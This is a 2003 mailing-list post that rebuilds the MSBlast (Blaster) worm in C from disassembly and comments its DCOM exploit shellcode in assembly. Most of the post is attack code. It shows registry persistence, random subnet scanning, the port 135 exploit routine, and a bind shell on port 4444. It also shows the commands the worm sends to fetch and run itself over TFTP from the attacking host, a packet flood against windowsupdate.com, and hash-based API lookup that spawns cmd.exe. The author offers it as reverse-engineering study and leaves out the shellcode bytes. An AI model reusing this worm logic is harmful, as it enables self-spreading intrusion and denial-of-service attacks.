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Recoding msblast.exe in C from disassembly
- To: bugtraq@securityfocus.com
- Subject: Recoding msblast.exe in C from disassembly
- From: Rolf Rolles <rolf.rolles@ncf.edu>
- Date: 14 Aug 2003 06:19:21 -0000
DISCLAIMER: Do not fix the poor syntax in my C code and compile it. If
you do
something stupid with this, that's your problem, and I'm not responsible.
The way I
figure it, if you go out of your way to fix this to get it to compile,
then you've
modified the code, it's not my work anymore, and therefore I am not
I did this for one reason only: pure RE for the sake of RE.
Anyway ... this is my first-ever binary analysis. MSBlast.exe and a dump
of the exploit
sent over port 135 were obtained from various people on IRC (thanks
snacker and f0dder,
respectively). Both were analyzed with IDA. It took two or three hours
to analyze the
exploit, and ten hours to analyze msblast.
Preliminary notes.
MSBlast was compiled with LCC 1.x, which made it particularly easy to
The exploit encrypts itself via XOR. A few simple modifications to
the "Ripper" IDC
on datarescue's site takes care of this "protection".
A summary of MSBLAST, from the victim's standpoint:
A request comes in on port 135. If open, the attacker immediately sends
the exploit.
I am uncertain as to which platforms the return address[es] works on
(though I know for
a fact that an address was circulating privately that worked on both 2k
SP* and XP SP*).
The shellcode binds cmd.exe to 135, and the attacker sends the following
string of
* tftp -i source_ip GET msblast.exe\n
* start msblast.exe\n
? msblast.exe\n
TFTP installs standard into \windows\system32. TFTP is perfectly suited
for this
application: all msblast.exe has to do is fopen itself and send 200h byte
chunks. Easy.
(Interestingly, I tried to get infected from a random box in the wild, and
every time I
got a hit on port 135, the TFTP would not have finished by the time that
the "start
msblast" command was executed. On a related note, the first copy of the
binary I got
from IRC was incomplete. Perhaps a longer Sleep() is needed to rectify
this problem.)
When msblast loads, its first action is to put itself into the 'run'
registry key.
Next it picks a random class-C to scan, iteratively. Then it checks the
date; if the
date is greater than 15 and the month is greater than 8, it starts a
thread that lobs
custom-generated packets at windowsupdate.com. Regardless of whether the
date conditions
hold, it begins the scan on the class-C. The scan uses 20 threads at a
That's about all there is to it. It uses a trick in infect_host() that
I'm not aware of
to determine which return value to use in the exploit, and I don't know
enough to tell
if there's anything remarkable about the generated packets it throws at
It's all there in the source, if anyone cares to illuminate.
In analyzing the code I was unable to determine why the victim system
reboots itself. Perhaps it's just that NT doesn't like system services
being killed.
The code follows. Functions are listed in the order in which they
physically appeared
in the binary.
I apologize for the formatting.
Oh, and as mentioned above, this will not compile. I haven't coded
anything serious
in C for sufficiently long enough that I forgot the proper syntax in some
Also, if you examine the infect_host() function, you will see a reason
that the
code wouldn't work as-is even if it did compile. And to be on the safe
side, I left
the request1-4, bindstr and shellcode out of the source. They're the same
as in
any other published DCOM exploit, with a small exception: request4
differs in the
first seven bytes, but is identical otherwise, with the xfocus/k-otic/HDM
the first seven bytes are 0xbe 0x22 0x9c 0x80 0x73 0xfe 0x58 rather than
0x01 0x10 0x08 0x00 0xcc 0xcc 0xcc.
// globals
unsigned long keystatus, class_a, class_b, class_c, t1, t2, t3, t4,
unsigned long mysterious_dword=1, mystery_dword2=0;
char filename[0x104], *msblast="msblast.exe";
sockaddr cp;
socket s;
main(int argc, char *argv[])
WSAData WSAData;
char name[512];
in_addr in;
*hostent_ptr ptr_to_hostent;
unsigned long passed=0;
char DateStr[3], MonthStr[3];
(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\windows",
NULL, 0xF003F, NULL, &keystatus, NULL);
RegSetValueExA(keystatus, "windows auto update", NULL, (ULONG)
1, "msblast.exe", (ULONG) 0x32);
CreateMutexA(NULL, (ULONG)1, "BILLY");
if(GetLastError()!=0xb7) ExitProcess(0);
if(WSAStartup(MAKEWORD(2,2), &WSAData) || WSAStartup(MAKEWORD
(1,1), &WSAData) \
|| WSAStartup((WORD)1, &WSAData))
GetModuleFileNameA(NULL, &filename, SIZEOF(filename));
while (!InternetGetConnectedState(&ThreadID, NULL)) {Sleep
class_a = (rand() % 254)+1;
class_b = (rand() % 254)+1;
if((gethostname(&name, 512)!=-1) ||
if((unsigned long)*(ptr_to_hostent.h_list))
memcpy(&in, *(ptr_to_hostent.h_list), 4);
sprintf(&name, "%s", inet_ntoa(in.s_addr));
t1=atoi(strtok(&name, '.'));
t2=atoi(strtok(&name, '.'));
t3=atoi(strtok(&name, '.'));
if (t3>20)
t3 -= (rand() % 20);
if((rand() % 20)>12) passed=0; // this is weird
if((rand()%10)>7) unknown_var=2;
t1 = (rand() % 254)+1;
t2 = (rand() % 254);
t3 = (rand() % 254);
GetDateFormatA(0x409, NULL, NULL, "d", &DateStr, 3);
GetDateFormatA(0x409, NULL, NULL, "d", &MonthStr, 3);
if((atoi(&DateStr)>15) && (atoi(&MonthStr)>8))
CreateThread(NULL, NULL, &AttackMS, NULL, NULL,
while(1==1) {ScanAndInfect();}
void send_copy_of_self()
char buf[0x204];
sockaddr name;
sockaddr to;
unsigned long tolen=16, readlen;
unsigned int var_204, var_202, var_200, i=0;
FILE *thisfile;
if((s=socket(2,2,0))==-1) goto this_loc_ret;
memset(&name, NULL, 0x10);
(unsigned int)name.sa_data=(unsigned int)htons(69);
if(!(bind(s,&name, 0x10))) goto this_loc_ret;
if((recvfrom(s,&buf, 0x204,NULL,&from, &fromlen))==-1) goto
if(!(thisfile=fopen(&filename,"rb"))) goto this_loc_ret;
var_204=(unsigned int)htons(3);
var_202=(unsigned int)htons(i);
readlen=fread(&var_200, 1, 0x200, thisfile);
if((sendto(s, &var_204, filelen, NULL, &to))<1) goto
if(readlen<0x204) goto send_self_loop;
goto this_loc_ret;
if(!((unsigned long)thisfile)) goto this_loc_ret;
goto this_loc_ret;
goto this_sub_start; // strange, but true
void inc_tvals()
if(t4>254) {t4=0; t3++;}
else {t4++; return;}
if(t3>254) {t3=0; t2++;}
else {t3++; return;}
if(t2>254) {t2=0; t1++;}
else {t1++; return;}
if(t1>254) {t1=0; goto inc_tvals_start;}
void ScanAndInfect()
fd_set writefds; // there's actually 64 fds in this array,
although only 20 are used.
in_addr in;
unsigned long namelen, argp=1, tempvar2, tempvar3;
sockaddr name;
socket s[20], currsock;
timeval timeout;
memset(&name, 0, 16);
for(int i=0; i<20; i++)
s[i*4]=socket((unsigned long)2, (unsigned long)1,
(unsigned long)0);
if((unsigned long)s[i*4]=-1) return;
ioctlsocket(s[i*4], 0x8004667e, argp);
for(int i=0; i<20; i++)
sprintf(&cp, "%i.%i.%i.%i", t1, t2, t3, t4);
if(tempvar2=-1) return;
(unsigned long)name.sa_data[2]=(unsigned long)tempvar2;
connect(s[i*4], &name, 16);
for(int i=0; i<20; i++)
timeout.tv_sec=0; timeout.tv_usec=0; writefds.fd_count=0;
while (tempvar3 < writefds.fd_count)
if((writefds.fd_array[tempvar3]==currsock)) break;
if((writefds.fd_count==tempvar3) &&
if((select(NULL, NULL, &writefds, NULL, &timeout)<1)
getpeername(s[i*4], &name, &namelen); // ??
doesn't seem to use the result of this call
infect_host(s[i*4], inet_ntoa(in.s_addr));
int __cdecl infect_host(SOCKET s,char *cp)
sockaddr name;
char fake_sockaddr[0x10], buf[0x370+0x2cc+0x3c], buf2[0x48];
unsigned long argp=0, returnaddy=0, ipaddyofhosttoinfect, hObject,
/* At this point in the code there's some weirdness.
mov eax, 2934h
call the_code_below
pop ecx
sub esp, 1000h
sub eax, 1000h
test [esp], eax
cmp eax, 1000h
jnb short loc_4022B9
sub esp, eax
test [esp], eax
jmp ecx
Anyone know what the hell this is? I'm guessing LCC did not
compile this code. */
ioctlsocket(s,0x8004667e, &argp);
if(mystery_dword2==1) returnaddy=0x100139d;
else returnaddy=0x18759f;
/* memcpy(&buf, &bindcode, 72);
memcpy(&somestackvar, &request1, 864);
memcpy(&somestackvar2, &request2, 16);
memcpy(&somestackvar3, &request3, 60);
memcpy(&somestackvar4, &sc, 716);
memcpy(&somestackvar5, &request4, 48);
This is unnecessary crap in the code. I rewrote it below.*/
memcpy(buf2, bindcode, 0x48);
memcpy(buf, request1, 0x360);
memcpy(buf+0x360, request2, 0x10);
memcpy(buf+0x370, sc, 0x2cc);
memcpy(buf+0x394, returnaddy, 4);
(unsigned long *)buf[0x370]+=(unsigned long)0x166;
(unsigned long *)buf[0x378]+=(unsigned long)0x166;
memcpy(buf+0x370+0x2cc, request3, 0x3c);
memcpy(buf+0x370+0x2cc+0x3c, request4, 0x30);
(unsigned long *)buf[0x8]+=(unsigned long)0x2c0;
(unsigned long *)buf[0x10]+=(unsigned long)0x2c0;
(unsigned long *)buf[0x80]+=(unsigned long)0x2c0;
(unsigned long *)buf[0x84]+=(unsigned long)0x2c0;
(unsigned long *)buf[0xb4]+=(unsigned long)0x2c0;
(unsigned long *)buf[0xb8]+=(unsigned long)0x2c0;
(unsigned long *)buf[0xd0]+=(unsigned long)0x2c0;
(unsigned long *)buf[0x18c]+=(unsigned long)0x2c0;
if((send(s, &buf2, 0x48, NULL))==-1) goto common_socket_failure;
if((send(s, &buf, len, NULL))==-1) goto common_socket_failure;
if((sploit_socket=socket(2, 1, 0))==-1) goto common_socket_failure;
memset(&name, (unsigned int)0, 0x10);
name.sa_data=(unsigned int)htons(4444);
if((name.sa_data[2]=(unsigned long)inet_addr(BOX_TO_INFECT))==-1)
goto common_socket_failure;
if((connect(sploit_socket, &name, 0x10))==-1) goto
memset(&ipofsendingbox, (unsigned int)0, 0x10);
memset(&fake_sockaddr, (unsigned int)0, 0x10);
getsockname(sploit_socket, &fake_sockaddr, &namelen);
sprintf(&ipofsendingbox, "%d.%d.%d.%d", (unsigned short)
fake_sockaddr[4],(unsigned short)fake_sockaddr[5],(unsigned short)
fake_sockaddr[6],(unsigned short)fake_sockaddr[7]);
if(s) closesocket(s);
hObject=CreateThread(NULL, NULL, &send_copy_of_self, NULL, NULL,
sprintf(&cmdbuffer, "tftp -i %s GET %s\n", &ipofsendingbox,
if((send(sploit_socket, &cmdbuffer, strlen(&cmdbuffer), NULL))<1)
goto close_socket;
for(int i=0; i<10; i++)
if (mysterious_dword=0) break;
else Sleep(2000);
sprintf(&cmdbuffer, "start %s\n", &msblast);
if((send(sploit_socket, &cmdbuffer, strlen(&cmdbuffer), NULL))<1)
goto close_socket;
sprintf(&cmdbuffer, "%s\n", &msblast);
send(sploit_socket, &cmdbuffer, strlen(&cmdbuffer), NULL);
if(sploit_socket) closesocket(sploit_socket2);
TerminateThread(hObject, NULL);
if(hObject) CloseHandle(hObject);
unsigned int checksum(char *checkdata, unsigned long checklength)
int j=0;
unsigned long accum, accum2, accum3;
unsigned int currword;
for(i=checklength; i>1; i-=2)
currword = (unsigned int)checkdata[j];
if(i==1) accum+=(unsigned short)checkdata[j+1];
accum3 &= (unsigned long)0x0000FFFF;
accum = accum2;
accum += accum3;
accum2 = accum;
accum2 >> 16;
accum += accum2;
accum = ~accum;
accum &= (unsigned long)0x0000ffff;
return accum;
int __cdecl GetIpAddy(char *name)
unsigned long E_AX;
E_AX=(unsigned long)inet_addr(name);
if (E_AX!=-1) return E_AX;
E_AX=(unsigned long)gethostbyname(name);
if (E_AX==-1) return E_AX;
E_AX=(unsigned long)*(*(*(E_AX+12)));
return E_AX;
unsigned long __stdcall AttackMS(LPVOID)
unsigned long ipaddrms, socketms, sockoptsretval, optval=1;
ipaddrms=(unsigned long)GetIPAddy("windowsupdate.com");
socketms=WSASocketA(2,3,0xff,NULL,NULL,1); if (socketms==-1)
sockoptsretval=setsockopt(E_BX, NULL, 2, &optval, (unsigned long)
4); if (sockoptsretval==-1) return;
while(1==1) {build_and_send_packets(ipaddrms, socketms); Sleep
void build_and_send_packets(unsigned long msipaddr, socket s)
char buf1[0xc];
char buf[0x64];
sockaddr to;
char name[0x10];
sprintf(&name, "%i.%i.%i.%i", class_a, class_b, rand()%255, rand()%
to.sa_data=(unsigned int)htons(0x50);
buf[0x50]=(unsigned short)0x45;
buf[0x52]=(unsigned int)htons(0x28);
buf[0x54]=(unsigned int)1;
buf[0x56]=(unsigned int)0;
buf[0x58]=(unsigned short)0x80;
buf[0x59]=(unsigned short)6;
buf[0x5a]=(unsigned int)0;
buf[0x60]=(unsigned long)msipaddr;
buf[0x3e]=(unsigned int)htons(0x50);
buf[0x44]=(unsigned long)0;
buf[0x46]=(unsigned short)0x50;
buf[0x47]=(unsigned short)2;
buf[0x48]=(unsigned int)htons(0x4000);
buf[0x4a]=(unsigned int)0;
buf[0x4c]=(unsigned int)0;
buf1[4]=(unsigned long)msipaddr;
buf1[8]=(unsigned short)0;
buf1[9]=(unsigned short)0;
buf1[10]=(unsigned int)htons(0x14);
buf[0x5c]=(unsigned long)msipaddr;
buf[0x3c]=(unsigned int)htons((rand() % 1000)+1000);
var_9c |= rand();
var_9c &= (unsigned long)0x0000FFFF;
buf[0x40]=(unsigned int)htons(var_9c);
memcpy(&buf, &buf1, 0xc);
memcpy(&buf[8], &buf[0x38], 0x14);
buf[0x4c]=(unsigned int)checksum(&buf, 0x20);
memcpy(&buf, &buf[0x50], 0x14);
memcpy(&buf[0x14], &buf[0x3c], 0x14);
memset(&buf[0x28], (unsigned int) 0, 4);
buf[0x5a]=(unsigned int)checksum(&buf, 0x28);
memcpy(&buf, &buf[0x50], 0x14);
// again, anyone know what kind of packets these are?
sendto(s, &buf, 0x28, NULL, &to, 0x10);
And the analysis of the exploit itself: (the comments became sparse when
I realized
that the code was ripped from HalVar (URL is below)). ScanForAPI is
thoroughly commented.
loc_4AF: ; CODE XREF: seg000:000004A8j
sub esp, 34h
mov esi, esp
call GetKernel32BaseAddy
mov [esi], eax ; EAX is the base address of
push dword ptr [esi]
push 0EC0E4E8Eh ; corresponds to LoadLibraryA
call ScanForAPI
mov [esi+8], eax
push dword ptr [esi]
push 0CE05D9ADh ; WaitForSingleObject
call ScanForAPI
mov [esi+0Ch], eax
push 6C6Ch
push 642E3233h
push 5F327377h ; ws32_2.dll
push esp
call dword ptr [esi+8]
mov [esi+4], eax ; esi + 4 = HModule of ws32_2.dll
push dword ptr [esi]
push 16B3FE72h ; CreateProcessA
call ScanForAPI
mov [esi+10h], eax
push dword ptr [esi]
push 73E2D87Eh ; ExitProcess
call ScanForAPI
mov [esi+14h], eax
push dword ptr [esi+4]
push 3BFCEDCBh ; WSAStartup
call ScanForAPI
mov [esi+18h], eax
push dword ptr [esi+4]
push 0ADF509D9h ; WSASocketA
call ScanForAPI
mov [esi+1Ch], eax
push dword ptr [esi+4]
push 0C7701AA4h ; bind
call ScanForAPI
mov [esi+20h], eax
push dword ptr [esi+4]
push 0E92EADA4h ; listen
call ScanForAPI
mov [esi+24h], eax
push dword ptr [esi+4]
push 498649E5h ; accept
call ScanForAPI
mov [esi+28h], eax
push dword ptr [esi+4]
push 79C679E7h ; closesocket
call ScanForAPI
mov [esi+2Ch], eax
xor edi, edi
sub esp, 190h
push esp
push 101h
call dword ptr [esi+18h] ; WSAStartup returns 0 if
push eax
push eax
push eax
push eax
inc eax
push eax
inc eax
push eax ; call wsasocketa
call dword ptr [esi+1Ch] ; this code sequence stolen
from halvar @ www.darklab.org/archive/msg00183.html
mov ebx, eax ; ironically, halvar decries
source stealing in that link .. heh
push edi
push edi
push 5C110002h
mov ecx, esp
push 16h
push ecx
push ebx
call dword ptr [esi+20h] ; bind
push edi
push ebx
call dword ptr [esi+24h] ; listen
push edi
push ecx
push ebx
call dword ptr [esi+28h] ; accept
mov edx, eax
push 657865h ; cmd.exe
push 2E646D63h
mov [esi+30h], esp
sub esp, 54h
lea edi, [esp]
xor eax, eax
xor ecx, ecx
add ecx, 15h
loc_5C2: ; CODE XREF: seg000:000005C3j
loop loc_5C2
mov byte ptr [esp+10h], 44h ; 'D'
inc byte ptr [esp+3Dh]
mov [esp+48h], edx
mov [esp+4Ch], edx
mov [esp+50h], edx
lea eax, [esp+10h]
push esp
push eax
push ecx
push ecx
push ecx
push 1
push ecx
push ecx
push dword ptr [esi+30h]
push ecx
call dword ptr [esi+10h] ; CreateProcessA
mov ecx, esp
push dword ptr [ecx]
call dword ptr [esi+0Ch] ; waitforsingleobject
mov ecx, eax
push edi
call dword ptr [esi+2Ch] ; closesocket
call dword ptr [esi+14h] ; exitprocess
GetKernel32BaseAddy proc near ; CODE XREF: seg000:000004B4p
push ebp ; see halvar's code for comments
push esi
mov eax, large fs:30h
test eax, eax
js short loc_618
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
mov ebp, [eax+8]
jmp short loc_621
loc_618: ; CODE XREF:
mov eax, [eax+34h]
mov ebp, [eax+0B8h]
loc_621: ; CODE XREF:
mov eax, ebp
pop esi
pop ebp
retn 4
GetKernel32BaseAddy endp
ScanForAPI proc near ; CODE XREF: seg000:000004C2p
; seg000:000004D1p ...
pattern = dword ptr 14h
baseaddy = dword ptr 18h
push ebx
push ebp
push esi
push edi
mov ebp, [esp+baseaddy] ; get start of given DLL in
mov eax, [ebp+3Ch] ; get start of PE header
mov edx, [ebp+eax+78h] ; get base of export table
add edx, ebp ; edx = mem addy of export table
mov ecx, [edx+18h] ; ecx = number of names
mov ebx, [edx+20h] ; ebx = RVA of AddressOfNames
add ebx, ebp ; ebx = mem addy of AddressOfNames
loc_641: ; CODE XREF: ScanForAPI+36j
jecxz short loc_675 ; if ECX = 0, couldn't find
the 'string'
dec ecx ; each time through the loop, ecx--
mov esi, [ebx+ecx*4] ; get RVA of first name
add esi, ebp ; convert it into mem addy
xor edi, edi ; clear EDI so it can assume its
cld ; direction = forwards
loc_64C: ; CODE XREF: ScanForAPI+30j
xor eax, eax
lodsb ; load a byte of the API name from
cmp al, ah ; did we load a zero byte?
jz short loc_65A ; yeah, we're done for this name
ror edi, 0Dh ; nope, form the weirdo value in
add edi, eax
jmp short loc_64C ; restart
loc_65A: ; CODE XREF: ScanForAPI+29j
cmp edi, [esp+pattern] ; did the API name match what
we wanted?
jnz short loc_641 ; nope, retry
mov ebx, [edx+24h]
add ebx, ebp ; ebx = mem addy of
mov cx, [ebx+ecx*2] ; cx = ordinal of function
mov ebx, [edx+1Ch]
add ebx, ebp ; ebx = mem addy
of "AddressOfFunctions"
mov eax, [ebx+ecx*4] ; take EAX = RVA of ordinal #cx
add eax, ebp ; eax becomes a mem addy
jmp short loc_677 ; done
loc_675: ; CODE XREF: ScanForAPI+19j
xor eax, eax ; couldn't find it, so EAX=0
loc_677: ; CODE XREF: ScanForAPI+4Bj
mov edx, ebp ; edx = base addy of DLL
pop edi
pop esi
pop ebp
pop ebx
retn 4 ; cleanup and return
ScanForAPI endp
Accz, cynica_l, blorght, halvar the bigshot, analyst, zen, nu, nroc,
carpathia, all of #ol,
Jessica and my family.